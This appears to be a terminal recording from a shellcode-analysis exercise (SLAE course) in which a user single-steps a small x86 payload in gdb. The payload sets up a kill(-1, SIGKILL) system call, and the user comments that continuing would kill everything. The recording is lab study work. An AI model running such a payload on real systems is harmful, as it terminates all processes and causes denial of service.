\u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b"]
[70.090972, "o", "[m\u001b[25;36H\u001b[?12l\u001b[?25h"]
[70.158734, "o", " "]
[70.184443, "o", "\u001b[?25l\u001b[Hedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x40201e to 0x402028:\u001b[K\r\n=> 0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201e in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax           "]
[70.191124, "o", " 0x25     37\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) EAX is now OK with the SYSTEM\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b"]
[70.19172, "o", "[m\u001b[25;37H\u001b[?12l\u001b[?25h"]
[70.304343, "o", "C"]
[70.39039, "o", "A"]
[70.495399, "o", "L"]
[70.647501, "o", "L"]
[70.799008, "o", " "]
[71.415014, "o", "c"]
[71.591014, "o", "o"]
[71.679049, "o", "d"]
[71.769653, "o", "e"]
[73.370446, "o", " "]
[73.671944, "o", "f"]
[73.77105, "o", "o"]
[73.872646, "o", "r"]
[73.977302, "o", " "]
[74.304355, "o", "k"]
[74.504728, "o", "i"]
[74.704701, "o", "l"]
[74.83239, "o", "l"]
[75.280782, "o", "("]
[75.441543, "o", ")"]
[76.475066, "o", "\b\u001b[K"]
[76.974688, "o", "\b\u001b[K"]
[77.005623, "o", "\b\u001b[K"]
[77.037674, "o", "\b\u001b[K"]
[77.067289, "o", "\b\u001b[K"]
[77.096795, "o", "\b\u001b[K"]
[77.126757, "o", "\b\u001b[K"]
[77.157111, "o", "\b\u001b[K"]
[77.187584, "o", "\b\u001b[K"]
[77.217665, "o", "\b\u001b[K"]
[77.249804, "o", "\b\u001b[K"]
[77.278213, "o", "\b\u001b[K"]
[77.311558, "o", "\b\u001b[K"]
[77.347957, "o", "\b\u001b[K"]
[77.380571, "o", "\b\u001b[K"]
[77.415638, "o", "\b\u001b[K"]
[77.441886, "o", "\b\u001b[K"]
[77.473936, "o", "\b\u001b[K"]
[77.503188, "o", "\b\u001b[K"]
[77.535938, "o", "\b\u001b[K"]
[77.56712, "o", "\b\u001b[K"]
[77.60038, "o", "\b\u001b[K"]
[77.632688, "o", "\b\u001b[K"]
[77.663398, "o", "\b\u001b[K"]
[77.699395, "o", "\b\u001b[K"]
[77.73214, "o", "\b\u001b[K"]
[77.762996, "o", "\b\u001b[K"]
[77.79539, "o", "\b\u001b[K"]
[77.825251, "o", "\b\u001b[K"]
[77.857893, "o", "\b\u001b[K"]
[77.88573, "o", "\b\u001b[K"]
[77.917785, "o", "\b\u001b[K"]
[77.948127, "o", "\b\u001b[K"]
[77.981142, "o", "\b\u001b[K"]
[78.01175, "o", "\b\u001b[K"]
[78.043599, "o", "\b\u001b[K"]
[78.078808, "o", "\b\u001b[K"]
[78.10685, "o", "\b\u001b[K"]
[78.136674, "o", "\b\u001b[K"]
[78.166878, "o", "\b\u001b[K"]
[78.197813, "o", "\b\u001b[K"]
[78.231052, "o", "\b\u001b[K"]
[78.262195, "o", "\b\u001b[K"]
[78.294851, "o", "\b\u001b[K"]
[78.330907, "o", "\b\u001b[K"]
[78.35657, "o", "\b\u001b[K"]
[78.384365, "o", "\b\u001b[K"]
[78.415232, "o", "\b\u001b[K"]
[78.44609, "o", "\b\u001b[K"]
[78.479153, "o", "\b\u001b[K"]
[78.510378, "o", "\u0007"]
[78.541113, "o", "\u0007"]
[78.57173, "o", "\u0007"]
[78.633601, "o", "\u0007"]
[78.663976, "o", "\u0007"]
[78.696837, "o", "\u0007"]
[78.728326, "o", "\u0007"]
[78.758743, "o", "\u0007"]
[78.787936, "o", "\u0007"]
[78.818587, "o", "\u0007"]
[79.347716, "o", "s"]
[79.508372, "o", "i"]
[79.876018, "o", "\u001b[1;25r\u001b[13S\u001b[13;1Heax            0x25\u001b[5C37\r\nebx            0xffffffff\u001b[7C-1\r\necx            0x9\u001b[6C9\r\nedx            0xb7fb786e\u001b[7C-1208256402\r\nDump of assembler code from 0x402021 to 0x40202b:\r\n=> 0x00402021 <code+25>:\u001b[8Cint    0x80\r\n   0x00402023 <code+27>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402025:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402027:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402029:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x00402021 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[80.096781, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[80.097214, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[80.175117, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[80.175405, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[81.243758, "o", "E"]
[81.492997, "o", "B"]
[81.813032, "o", "X"]
[82.01319, "o", " "]
[82.261185, "o", "i"]
[82.387993, "o", "s"]
[82.541221, "o", " "]
[83.285606, "o", "n"]
[83.502098, "o", "o"]
[83.621545, "o", "w"]
[83.715744, "o", " "]
[83.917074, "o", "-"]
[84.045903, "o", "1"]
[85.519353, "o", "."]
[85.670289, "o", "."]
[85.838222, "o", "."]
[85.911096, "o", " "]
[86.326886, "o", "I"]
[86.406936, "o", " "]
[86.807023, "o", "\b\u001b[K"]
[87.230905, "o", "f"]
[87.375751, "o", " "]
[87.959489, "o", "I"]
[88.327575, "o", " "]
[88.44092, "o", "w"]
[88.544098, "o", "i"]
[88.744202, "o", "l"]
[88.895864, "o", "l"]
[88.936495, "o", " "]
[89.096948, "o", "c"]
[89.119864, "o", "o"]
[89.336699, "o", "n"]
[89.455856, "o", "t"]
[89.548765, "o", "i"]
[89.719941, "o", "n"]
[89.919985, "o", "u"]
[90.016504, "o", "e"]
[90.115794, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[90.116088, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) EBX is now -1... If I will continue\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b"]
[90.116219, "o", "[m\u001b[25;42H\u001b[?12l\u001b[?25h"]
[90.217169, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[90.217726, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) EBX is now -1... If I will continue\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b"]
[90.21789, "o", "[m\u001b[25;42H\u001b[?12l\u001b[?25h"]
[90.35247, "o", ","]
[90.376611, "o", " "]
[91.057047, "o", "e"]
[91.31259, "o", "v"]
[91.480871, "o", "e"]
[91.566754, "o", "r"]
[91.713826, "o", "y"]
[91.866445, "o", "t"]
[91.949572, "o", "h"]
[92.138432, "o", "i"]
[92.313574, "o", "n"]
[92.419155, "o", "g"]
[92.578232, "o", " "]
[92.841446, "o", "w"]
[92.940586, "o", "i"]
[93.15387, "o", "l"]
[93.308041, "o", "l"]
[93.390068, "o", " "]
[93.539106, "o", "b"]
[93.650232, "o", "e"]
[93.745882, "o", " "]
[94.227826, "o", "k"]
[94.404268, "o", "i"]
[94.626704, "o", "l"]
[94.77066, "o", "l"]
[95.099628, "o", "e"]
[95.220117, "o", "d"]
[95.58924, "o", " "]
[95.691262, "o", ":"]
[95.971354, "o", ")"]
[100.102127, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[100.102423, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) EBX is now -1... If I will continue, everything will be killed :)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;"]
[100.102802, "o", "5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;72H\u001b[?12l\u001b[?25h"]
[100.174032, "o", "\u001b[?25l\u001b[Hecx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()"]
[100.174338, "o", "\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff       -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) EBX is now -1... If I will continue, everything will be killed :)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;"]
[100.174525, "o", "5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;72H\u001b[?12l\u001b[?25h"]
[102.423348, "o", "\b\u001b[K"]
[102.922879, "o", "\b\u001b[K"]
[102.954079, "o", "\b\u001b[K"]
[102.986505, "o", "\b\u001b[K"]
[103.019286, "o", "\b\u001b[K"]
[103.0491, "o", "\b\u001b[K"]
[103.079175, "o", "\b\u001b[K"]
[103.112968, "o", "\b\u001b[K"]
[103.139542, "o", "\b\u001b[K"]
[103.173706, "o", "\b\u001b[K"]
[103.202396, "o", "\b\u001b[K"]
[103.233213, "o", "\b\u001b[K"]
[103.264252, "o", "\b\u001b[K"]
[103.294062, "o", "\b\u001b[K"]
[103.326559, "o", "\b\u001b[K"]
[103.356694, "o", "\b\u001b[K"]
[103.388733, "o", "\b\u001b[K"]
[103.418133, "o", "\b\u001b[K"]
[103.452751, "o", "\b\u001b[K"]
[103.479193, "o", "\b\u001b[K"]
[103.510005, "o", "\b\u001b[K"]
[103.540011, "o", "\b\u001b[K"]
[103.570804, "o", "\b\u001b[K"]
[103.600469, "o", "\b\u001b[K"]
[103.631909, "o", "\b\u001b[K"]
[103.662169, "o", "\b\u001b[K"]
[103.694027, "o", "\b\u001b[K"]
[103.723526, "o", "\b\u001b[K"]
[103.754907, "o", "\b\u001b[K"]
[103.789725, "o", "\b\u001b[K"]
[103.82137, "o", "\b\u001b[K"]
[103.85219, "o", "\b\u001b[K"]
[103.882511, "o", "\b\u001b[K"]
[103.918726, "o", "\b\u001b[K"]
[103.946956, "o", "\b\u001b[K"]
[103.976961, "o", "\b\u001b[K"]
[104.007566, "o", "\b\u001b[K"]
[104.037118, "o", "\b\u001b[K"]
[104.069074, "o", "\b\u001b[K"]
[104.101923, "o", "\b\u001b[K"]
[104.134899, "o", "\b\u001b[K"]
[104.164979, "o", "\b\u001b[K"]
[104.199766, "o", "\b\u001b[K"]
[104.232211, "o", "\b\u001b[K"]
[104.26611, "o", "\b\u001b[K"]
[104.297108, "o", "\b\u001b[K"]
[104.326896, "o", "\b\u001b[K"]
[104.357897, "o", "\b\u001b[K"]
[104.391478, "o", "\b\u001b[K"]
[104.419852, "o", "\b\u001b[K"]
[104.455066, "o", "\b\u001b[K"]
[104.487, "o", "\b\u001b[K"]
[104.520478, "o", "\b\u001b[K"]
[104.549532, "o", "\b\u001b[K"]
[104.576765, "o", "\b\u001b[K"]
[104.608136, "o", "\b\u001b[K"]
[104.63906, "o", "\b\u001b[K"]
[104.670624, "o", "\b\u001b[K"]
[104.701209, "o", "\b\u001b[K"]
[104.731229, "o", "\b\u001b[K"]
[104.7632, "o", "\b\u001b[K"]
[104.795579, "o", "\b\u001b[K"]
[104.825139, "o", "\b\u001b[K"]
[104.859137, "o", "\b\u001b[K"]
[104.889202, "o", "\b\u001b[K"]
[104.921574, "o", "\u0007"]
[104.953981, "o", "\u0007"]
[105.024276, "o", "\u0007"]
[105.054854, "o", "\u0007"]
[105.087762, "o", "\u0007"]
[105.118975, "o", "\u0007"]
[105.151089, "o", "\u0007"]
[105.182535, "o", "\u0007"]
[106.591568, "o", "e"]
[106.703421, "o", "x"]
[106.894377, "o", "i"]
[107.03845, "o", "t"]
[107.198643, "o", "\u001b[1;25r\u001b[2S\u001b[24;1HUndefined command: \"exit\".  Try \"help\".\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[109.672404, "o", "q"]
[109.856599, "o", "u"]
[110.072387, "o", "i"]
[110.12269, "o", "\u001b[?25l\u001b[HDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff    "]
[110.122978, "o", "   -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) exit\u001b[K\r\nUndefined command: \"exit\".  Try \"help\".\u001b[K\r\n(gdb) qui\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;10H\u001b[?12l\u001b[?25h"]
[110.211113, "o", "t"]
[110.230469, "o", "\u001b[?25l\u001b[HDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) si\u001b[K\r\neax            0x25     37\u001b[K\r\nebx            0xffffffff    "]
[110.230755, "o", "   -1\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402021 to 0x40202b:\u001b[K\r\n=> 0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402021 in code ()\u001b[K\r\n(gdb) exit\u001b[K\r\nUndefined command: \"exit\".  Try \"help\".\u001b[K\r\n(gdb) quit\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 